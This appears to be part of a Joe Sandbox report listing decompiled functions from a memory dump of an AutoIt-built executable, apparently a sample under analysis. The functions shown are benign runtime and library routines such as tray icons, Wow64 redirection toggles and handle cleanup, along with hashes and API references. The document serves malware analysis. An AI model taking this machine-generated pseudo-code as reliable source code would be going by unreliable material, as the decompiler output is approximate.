
Uniqueness

Uniqueness Score: -1.00%

Function 013B4C04, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E013B4C04(void* __ecx, void* __fp0) {
				struct _NOTIFYICONDATAW _v956;
				short _v1212;
				char _v1216;
				char _v1228;
				char _v1236;
				char _v1240;
				char _v1244;
				char _v1248;
				char _v1252;
				char _v1256;
				void* __edi;
				void* _t30;
				void* _t36;
				intOrPtr _t39;
				void* _t46;
				char* _t60;
				void* _t80;
				void* _t85;
				intOrPtr _t87;
				void* _t91;
				signed int _t92;
				void* _t94;
				void* _t102;

				_t102 = __fp0;
				_t94 = (_t92 & 0xfffffff8) - 0x4d8;
				_t96 =  *0x1482358;
				_push(_t82);
				_t85 = __ecx;
				if( *0x1482358 == 0) {
					L7:
					return _t30;
				}
				E013B791D( &_v1244, _t96, 0x104);
				if( *0x1482357 == 1) {
					LoadStringW( *0x1482348, 0x65,  &_v1212, 0x7f);
				} else {
					_v1212 = 0;
				}
				_t67 =  &_v1244;
				E013BB0DB( &_v1244,  &_v1212);
				if( *0x1482355 != 0) {
					_t87 =  *0x1482514; // 0x2a72
					_t36 = E013BBE8E(_t87);
					__eflags = _t36;
					if(_t36 != 0) {
						_t46 = E0141A1EF(_t87);
						_t82 = _t46;
						__eflags = _t46 - 0xffffffff;
						if(__eflags != 0) {
							_t21 =  &_v1228; // 0x2a72
							E013B9091(_t21, __eflags);
							_t22 =  &_v1228; // 0x2a72
							E0141A1AD(_t21, __eflags, _t82, _t22);
							_t23 =  &_v1236; // 0x2a72
							E013B4D30( &_v1252, _t102, _t23);
							_t25 =  &_v1240; // 0x2a72
							_t67 = _t25;
							E013B774C(_t25);
						}
						E013CFEFB(_t67, _t80,  &_v1216, L"\nLine %d: ", E0141A179(_t87));
						_t94 = _t94 + 0xc;
						E013B4DCB( &_v1248, _t102,  &_v1216);
						E013B4DCB( &_v1256, _t102, E013BBE8E(_t87));
					}
				} else {
					if( *((intOrPtr*)(_t85 + 0x60)) != 0) {
						_t91 = _t85 + 0x5c;
						_t60 =  &_v1244;
						__eflags = _t60 - _t91;
						if(_t60 != _t91) {
							E013B90C3(_t60, _t91);
						}
					} else {
						E013B4DCB( &_v1244, _t102, L"AutoIt - ");
						E013B4D30( &_v1248, _t102, 0x14823e0);
					}
				}
				E013D2760(_t82,  &(_v956.uCallbackMessage), 0, 0x3a8);
				_t39 =  *0x148237c; // 0x11005c
				_v956.cbSize = 0x3a8;
				_v956.hWnd = _t39;
				_v956.uID = 1;
				_v956.uFlags = 4;
				E013B4D09( &_v1212, _v1244, 0x80);
				E013D4DA3( &(_v956.szTip),  &_v1212);
				Shell_NotifyIconW(1,  &_v956);
				_t30 = E013B774C( &_v1252);
				goto L7;
			}

0x013b4c04
0x013b4c0a
0x013b4c10
0x013b4c18
0x013b4c19
0x013b4c1b
0x013b4d03
0x013b4d08
0x013b4d08
0x013b4c2a
0x013b4c36
0x013f46c0
0x013b4c3c
0x013b4c3e
0x013b4c3e
0x013b4c48
0x013b4c4c
0x013b4c58
0x013f46e7
0x013f46ee
0x013f46f3
0x013f46f5
0x013f46fc
0x013f4701
0x013f4703
0x013f4706
0x013f4708
0x013f470c
0x013f4711
0x013f4717
0x013f471c
0x013f4725
0x013f472a
0x013f472a
0x013f472e
0x013f472e
0x013f4744
0x013f4749
0x013f4755
0x013f4765
0x013f4765
0x013b4c5e
0x013b4c62
0x013f46cb
0x013f46ce
0x013f46d2
0x013f46d4
0x013f46dd
0x013f46dd
0x013b4c68
0x013b4c71
0x013b4c7f
0x013b4c7f
0x013b4c62
0x013b4c94
0x013b4c99
0x013b4ca9
0x013b4cb3
0x013b4cba
0x013b4cc6
0x013b4cd1
0x013b4ce4
0x013b4cf4
0x013b4cfe
0x00000000

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 013F46C0

Part of subcall function 013BB0DB: _wcslen.LIBCMT ref: 013BB0EE

Shell_NotifyIconW.SHELL32(00000001,?), ref: 013B4CF4

Strings

AutoIt - , xrefs: 013B4C68
r*r*, xrefs: 013F4708, 013F4711, 013F471C, 013F472A, 013F4715, 013F4720
Line %d: , xrefs: 013F473E

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt - $r*r*
API String ID: 2289894680-3312643555
Opcode ID: 4cc88c46651874bf262b96aa03df29689824317ec97d7f2f3675302d070fa71d
Instruction ID: 2deb74b4c053d404150d0aaa543bb04bb94ddf7ec2a239ffcc5898d548417c6e
Opcode Fuzzy Hash: 4cc88c46651874bf262b96aa03df29689824317ec97d7f2f3675302d070fa71d
Instruction Fuzzy Hash: EB41D5714043026BC721EB28DC94EEF77DC9FA4718F004A1EF689934A1FB709649C796

Uniqueness

Uniqueness Score: -1.00%

Function 013D518D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E013D518D(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				struct HINSTANCE__** _t12;
				intOrPtr* _t23;
				signed int _t25;

				_t10 =  *0x147d014; // 0xf9c9c506
				_v8 = _t10 ^ _t25;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t23 = GetProcAddress(_v12, "CorExitProcess");
					if(_t23 != 0) {
						 *0x144d894(_a4);
						 *_t23();
					}
				}
				if(_v12 != 0) {
					FreeLibrary(_v12);
				}
				return E013D0EAC(_v8 ^ _t25);
			}

0x013d5194
0x013d519b
0x013d519e
0x013d51a2
0x013d51ad
0x013d51b5
0x013d51c6
0x013d51ca
0x013d51d1
0x013d51d7
0x013d51d7
0x013d51d9
0x013d51de
0x013d51e3
0x013d51e3
0x013d51f6

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,013D513E,00000003,?,013D50DE,00000003,01479820,0000000C,013D5235,00000003,00000002), ref: 013D51AD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 013D51C0
FreeLibrary.KERNEL32(00000000,?,?,?,013D513E,00000003,?,013D50DE,00000003,01479820,0000000C,013D5235,00000003,00000002,00000000), ref: 013D51E3

Strings

mscoree.dll, xrefs: 013D51A6
CorExitProcess, xrefs: 013D51B8

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e72542c7933f09dc4fa2f8d8b66dd11c8333be6971154a042ff6364f2858b0d7
Instruction ID: e902689b0bcb2a7d8a5ca37f53af306141e5f5a8ce825f23ed6dc340d03dfc33
Opcode Fuzzy Hash: e72542c7933f09dc4fa2f8d8b66dd11c8333be6971154a042ff6364f2858b0d7
Instruction Fuzzy Hash: F4F06835E00208BBDB219FA9D849BAD7FB4EF54755F1001A9FD09A2164DB315940DB90

Uniqueness

Uniqueness Score: -1.00%

Function 013B320E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E013B320E(signed int* __ecx) {
				_Unknown_base(*)()* _t3;
				signed int* _t7;
				struct HINSTANCE__* _t8;

				_t7 = __ecx;
				 *__ecx =  *__ecx & 0x00000000;
				_t8 = LoadLibraryA("kernel32.dll");
				if(_t8 != 0) {
					_t3 = GetProcAddress(_t8, "Wow64DisableWow64FsRedirection");
					if(_t3 != 0) {
						 *_t3(_t7);
					}
					if(_t8 != 0) {
						FreeLibrary(_t8);
					}
				}
				return _t7;
			}

0x013b3210
0x013b3217
0x013b3220
0x013b3224
0x013b322c
0x013b3234
0x013b3237
0x013b3237
0x013b323b
0x013b323e
0x013b323e
0x013b323b
0x013b3248

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,013B2BF2,?,?,013B2B95,?,00000001,?,?,00000000), ref: 013B321A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 013B322C
FreeLibrary.KERNEL32(00000000,?,?,013B2BF2,?,?,013B2B95,?,00000001,?,?,00000000), ref: 013B323E

Strings

kernel32.dll, xrefs: 013B3212
Wow64DisableWow64FsRedirection, xrefs: 013B3226

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 6a5472ab830b1fc5afbf34a04b953f778310c5a4eb3fec0ff1f28e3b027adbaa
Instruction ID: 77067f0d461dfcd31f546dda3b8e904c3927d7ca36f3395b1cd7e71c0750851c
Opcode Fuzzy Hash: 6a5472ab830b1fc5afbf34a04b953f778310c5a4eb3fec0ff1f28e3b027adbaa
Instruction Fuzzy Hash: 8DE0CD39F0153157E3311759EC097AEA958AFD1D267050115FF00D621CEF70C901C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 013B31D7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E013B31D7(intOrPtr* __ecx) {
				_Unknown_base(*)()* _t1;
				intOrPtr* _t4;
				struct HINSTANCE__* _t5;

				_t4 = __ecx;
				_t1 = LoadLibraryA("kernel32.dll");
				_t5 = _t1;
				if(_t5 != 0) {
					_t1 = GetProcAddress(_t5, "Wow64RevertWow64FsRedirection");
					if(_t1 != 0) {
						_t1 =  *_t1( *_t4);
					}
					if(_t5 != 0) {
						return FreeLibrary(_t5);
					}
				}
				return _t1;
			}

0x013b31de
0x013b31e0
0x013b31e6
0x013b31ea
0x013b31f2
0x013b31fa
0x013b31fe
0x013b31fe
0x013b3202
0x00000000
0x013b3205
0x013b3202
0x013b320d

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,013F3B55,?,?,013B2B95,?,00000001,?,?,00000000), ref: 013B31E0
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 013B31F2
FreeLibrary.KERNEL32(00000000,?,?,013F3B55,?,?,013B2B95,?,00000001,?,?,00000000), ref: 013B3205

Strings

kernel32.dll, xrefs: 013B31D9
Wow64RevertWow64FsRedirection, xrefs: 013B31EC

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 5609423931562c5a8f529cd6dee59dd53538cb58b051c3b77306317ace67acbb
Instruction ID: ee2b53e8eeec8de9766925a3b0dd2aa34dc7962fc152505a183087f7db7de3b3
Opcode Fuzzy Hash: 5609423931562c5a8f529cd6dee59dd53538cb58b051c3b77306317ace67acbb
Instruction Fuzzy Hash: 2ED0123DA0253157E2331769AC18DDE6E15BF91E653150155FF10A662CDF30C905C794

Uniqueness

Uniqueness Score: -1.00%

Function 013E23E1, Relevance: 7.6, APIs: 5, Instructions: 129
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E013E23E1(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x147d014; // 0xf9c9c506
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E013D4FBD( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E013D023E(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x13c38f2
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E013D023E(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E013D023E(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E013E2C4B(_t56);
						_t40 = E013E2DE8(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E013E2C4B(_t56);
						E013E2DE8(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x147d014;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t19 = _t71 + 4; // 0xcd20e801
								_t71 = _t19;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x013e23e1
0x013e23eb
0x013e23ef
0x013e23f1
0x013e23f5
0x013e23ff
0x013e2410
0x013e2415
0x013e2417
0x013e2419
0x013e241b
0x013e241d
0x013e2421
0x013e24db
0x013e24e9
0x013e24eb
0x013e24f0
0x013e24f7
0x013e24f9
0x013e2507
0x013e2516
0x013e2519
0x013e251b
0x00000000
0x013e251c
0x013e2429
0x013e242e
0x013e2433
0x013e2435
0x013e2435
0x013e2437
0x013e243c
0x013e2440
0x013e2440
0x013e2443
0x013e2462
0x013e2462
0x013e2464
0x013e2467
0x013e2470
0x013e2473
0x013e2478
0x013e247b
0x013e2480
0x00000000
0x00000000
0x013e2482
0x00000000
0x013e2445
0x013e2445
0x013e2447
0x013e2450
0x013e2453
0x013e2458
0x013e245b
0x013e2460
0x013e248a
0x013e248d
0x013e248f
0x013e2492
0x013e249a
0x013e24a0
0x013e24a7
0x013e24a9
0x013e24b1
0x013e24c0
0x013e24c4
0x013e24c6
0x013e24c9
0x00000000
0x00000000
0x013e24cb
0x013e24ce
0x013e24d0
0x013e24d0
0x013e24d1
0x013e24d3
0x013e24d3
0x013e24d6
0x00000000
0x013e24d0
0x00000000
0x013e2460
0x013e2443
0x00000000

APIs

_free.LIBCMT ref: 013E2453
_free.LIBCMT ref: 013E2473

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7870b2a8d9b6029ba18f1362039368e2cf5e508167b98415b1942a4ac2f28210
Instruction ID: 3d9d7d1bfeed399922a1c15857fad890559cfd27f14de80e2af341bea60b560a
Opcode Fuzzy Hash: 7870b2a8d9b6029ba18f1362039368e2cf5e508167b98415b1942a4ac2f28210
Instruction Fuzzy Hash: 2F41C372E003149FCB25DFBCC884A5EB7F9EF89718F5545A8E916EB391D631A901CB40

Uniqueness

Uniqueness Score: -1.00%

Function 013B1E82, Relevance: 7.6, APIs: 5, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E013B1E82(void* __edi, void* __esi, struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, long _a16, long _a20) {
				struct tagLOGBRUSH _v16;
				int _t17;
				void* _t20;
				long _t22;
				void* _t23;
				intOrPtr _t26;
				long _t29;
				void* _t32;

				_t26 = _a8;
				if(_t26 == 0xffffffff) {
					L7:
					if(_a12 == 0xfffffffe || _a12 == 0xffffffff) {
						return _t17;
					} else {
						return SelectObject(_a4, E013B1F40(_a12, 0));
					}
				}
				_t29 = _a16;
				_t32 =  *0x1482994 - _t26; // 0x0
				if(_t32 == 0) {
					_t17 = _a20;
					__eflags =  *0x1482990 - _t17; // 0x0
					if(__eflags != 0) {
						goto L2;
					}
					__eflags =  *0x1482998 - _t29; // 0x0
					if(__eflags == 0) {
						L6:
						goto L7;
					}
				}
				L2:
				_t20 =  *0x1482984; // 0x0
				if(_t20 != 0) {
					DeleteObject(_t20);
					 *0x1482984 =  *0x1482984 & 0x00000000;
				}
				_t22 = _a20;
				_v16.lbStyle = _v16.lbStyle & 0x00000000;
				_v16.lbHatch = _v16.lbHatch & 0x00000000;
				 *0x1482990 = _t22;
				 *0x1482994 = _t26;
				 *0x1482998 = _t29;
				_v16.lbColor = _t26;
				if(_t22 != 1) {
					_t29 = _t29 | 0x00010000;
				}
				_t23 = ExtCreatePen(_t29, _t22,  &_v16, 0, 0);
				 *0x1482984 = _t23;
				_t17 = SelectObject(_a4, _t23);
				 *0x1482988 = _t17;
				if( *0x148298c == 0) {
					_t17 = BeginPath(_a4);
					 *0x148298c = 1;
				}
				goto L6;
			}

0x013b1e89
0x013b1e8f
0x013b1f10
0x013b1f15
0x013b1f32
0x013b1f1d
0x00000000
0x013b1f2b
0x013b1f15
0x013b1e92
0x013b1e95
0x013b1e9b
0x013f2ff4
0x013f2ff7
0x013f2ffd
0x00000000
0x00000000
0x013f3003
0x013f3009
0x013b1f0f
0x00000000
0x013b1f0f
0x013f300f
0x013b1ea1
0x013b1ea1
0x013b1ea8
0x013f3015
0x013f301b
0x013f301b
0x013b1eae
0x013b1eb1
0x013b1eb5
0x013b1eb9
0x013b1ebe
0x013b1ec4
0x013b1eca
0x013b1ed0
0x013b1f35
0x013b1f35
0x013b1edc
0x013b1ee6
0x013b1eeb
0x013b1ef8
0x013b1efd
0x013b1f02
0x013b1f08
0x013b1f08
0x00000000

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 013B1EDC
SelectObject.GDI32(?,00000000), ref: 013B1EEB
BeginPath.GDI32(?), ref: 013B1F02
SelectObject.GDI32(?,00000000), ref: 013B1F2B

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 135255e9029186539ef09b2537acda1b4f2d01f7201fbbdcd67e0a3fd293c53e
Instruction ID: a9bdf95ef8939cbfcca94a81d5866bf1702b6d90d527a2f4f7cdc4becf95053d
Opcode Fuzzy Hash: 135255e9029186539ef09b2537acda1b4f2d01f7201fbbdcd67e0a3fd293c53e
Instruction Fuzzy Hash: 4621A430A15209EFDB328F18F849BAD7BB8BB503A9F14021DFA14965A8E3B09595DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0141080C, Relevance: 7.6, APIs: 5, Instructions: 59stringCOMMON

Download Yara Rule

APIs

Part of subcall function 014112E1: RaiseException.KERNEL32(8007000E,?,00000000,00000000,?,0141082C,-C000001E,00000001,?,01410760,80070057,?,?,?,01410B7D), ref: 014112EE

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,01410760,80070057,?,?,?,01410B7D), ref: 0141084A
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01410760,80070057,?,?), ref: 01410865
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01410760,80070057,?,?), ref: 01410873
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01410760,80070057,?), ref: 01410883
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01410760,80070057,?,?), ref: 0141088F

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: From$Prog$ExceptionFreeRaiseStringTasklstrcmpi
String ID:
API String ID: 450394209-0
Opcode ID: 8a5ce27abfe2762f87825561a7b07bec8b8b7b77d9a18b257a0cff18536d887e
Instruction ID: 4a609451af49ae4ebb1b44b384edc3d8a1ba220a678300ea77801fac3a64d8d4
Opcode Fuzzy Hash: 8a5ce27abfe2762f87825561a7b07bec8b8b7b77d9a18b257a0cff18536d887e
Instruction Fuzzy Hash: BA11E576A00209EBE7205FA4CC05BAA7EADEB447A1F144525FE09E7224E774C98087A0

Uniqueness

Uniqueness Score: -1.00%

Function 013E3218, Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E013E3218(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x147d100; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E013E509D(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E013E3684(_t13, _t16, __eflags,  *0x147d100, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E013E3006(_t13, _t15, 0x1481db4);
							E013E2DE8(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E013E2DE8();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E013E362E(_t11, _t16, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x013e3218
0x013e3223
0x013e3225
0x013e3227
0x013e322c
0x013e322f
0x013e323d
0x013e3249
0x013e324c
0x013e324f
0x013e3261
0x013e3266
0x013e3268
0x013e3273
0x013e3279
0x013e3281
0x013e3283
0x00000000
0x00000000
0x00000000
0x00000000
0x013e326a
0x013e326a
0x00000000
0x013e326a
0x013e3251
0x013e3251
0x013e3252
0x013e3252
0x013e3285
0x013e3286
0x013e3286
0x013e3231
0x013e3237
0x013e323b
0x013e328e
0x013e328f
0x013e3295
0x00000000
0x00000000
0x00000000
0x013e323b
0x013e329c

APIs

GetLastError.KERNEL32(?,00000000,?,013E2C3D,013E3C83,?,?,013D0215,00000000,?,013B8E5F,00000004,?,013F4C6B), ref: 013E321D
_free.LIBCMT ref: 013E3252
_free.LIBCMT ref: 013E3279
SetLastError.KERNEL32(00000000), ref: 013E3286
SetLastError.KERNEL32(00000000), ref: 013E328F

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 438945ed0d8fca56f9842264b80b8df0760b43e3d679ee5c2482691be187595f
Instruction ID: 3447b23323daeda64fe4ecf1076c6eff030cab30ec0b6e82873635235e1c0915
Opcode Fuzzy Hash: 438945ed0d8fca56f9842264b80b8df0760b43e3d679ee5c2482691be187595f
Instruction Fuzzy Hash: E301D63654473527C623267DAC4CD6B26DDFFE067C7210129F955932D1EF2188018111

Uniqueness

Uniqueness Score: -1.00%

Function 01420B69, Relevance: 7.5, APIs: 6, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01420B69(void* __ecx) {
				int _t20;
				void* _t24;

				_t24 = __ecx;
				if( *(__ecx + 0x1c) != 0) {
					_t20 = CloseHandle( *(__ecx + 0x1c));
					 *((intOrPtr*)(_t24 + 0x1c)) = 0;
				}
				if( *(_t24 + 0xc) != 0) {
					_t20 = CloseHandle( *(_t24 + 0xc));
					 *(_t24 + 0xc) = 0;
				}
				if( *(_t24 + 0x14) != 0) {
					_t20 = CloseHandle( *(_t24 + 0x14));
					 *(_t24 + 0x14) = 0;
				}
				if( *(_t24 + 8) != 0) {
					_t20 = CloseHandle( *(_t24 + 8));
					 *(_t24 + 8) = 0;
				}
				if( *(_t24 + 0x10) != 0) {
					_t20 = CloseHandle( *(_t24 + 0x10));
					 *(_t24 + 0x10) = 0;
				}
				if( *(_t24 + 0x18) != 0) {
					_t20 = CloseHandle( *(_t24 + 0x18));
					 *(_t24 + 0x18) = 0;
				}
				 *((intOrPtr*)(_t24 + 4)) = 0;
				return _t20;
			}

0x01420b6b
0x01420b79
0x01420b7e
0x01420b80
0x01420b80
0x01420b86
0x01420b8b
0x01420b8d
0x01420b8d
0x01420b93
0x01420b98
0x01420b9a
0x01420b9a
0x01420ba0
0x01420ba5
0x01420ba7
0x01420ba7
0x01420bad
0x01420bb2
0x01420bb4
0x01420bb4
0x01420bba
0x01420bbf
0x01420bc1
0x01420bc1
0x01420bc5
0x01420bca

APIs

